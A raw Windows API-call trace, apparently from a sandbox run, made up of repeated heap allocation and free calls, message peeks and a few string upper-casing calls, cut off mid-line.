[0266.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0266.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0266.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0266.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0266.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0266.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0266.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0266.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0266.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0266.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0266.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0266.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0266.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0266.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0266.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0266.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0266.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0266.428] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0266.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0266.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0266.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0266.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0266.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0266.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0266.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0266.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0266.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0266.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0266.429] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0266.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0266.429] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0266.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0266.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ba8 [0266.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0266.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0266.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0266.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0266.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0266.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0266.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0266.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0266.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0266.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa950 [0266.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0266.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0266.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0266.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0266.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0266.430] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0266.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0266.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0266.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0266.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0266.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0266.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0266.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0266.431] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0266.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0266.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0266.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0266.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0266.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0266.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0266.431] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0266.432] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0266.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0266.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0266.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0266.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0266.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0266.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0266.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.432] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0266.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0266.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0266.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.433] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0266.433] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0266.433] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0266.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0266.433] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0266.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0266.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0266.433] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0266.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0266.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0266.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0266.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0266.434] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0266.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0266.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0266.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0266.434] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0266.435] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0266.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0266.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0266.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0266.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0266.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0266.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0266.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0266.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0266.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0266.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.436] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.436] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0266.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0266.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0266.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0266.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0266.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0266.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0266.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0266.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0266.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0266.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0266.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0266.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0266.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0266.437] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0266.437] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0266.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0266.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0266.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.438] HeapFree (in: 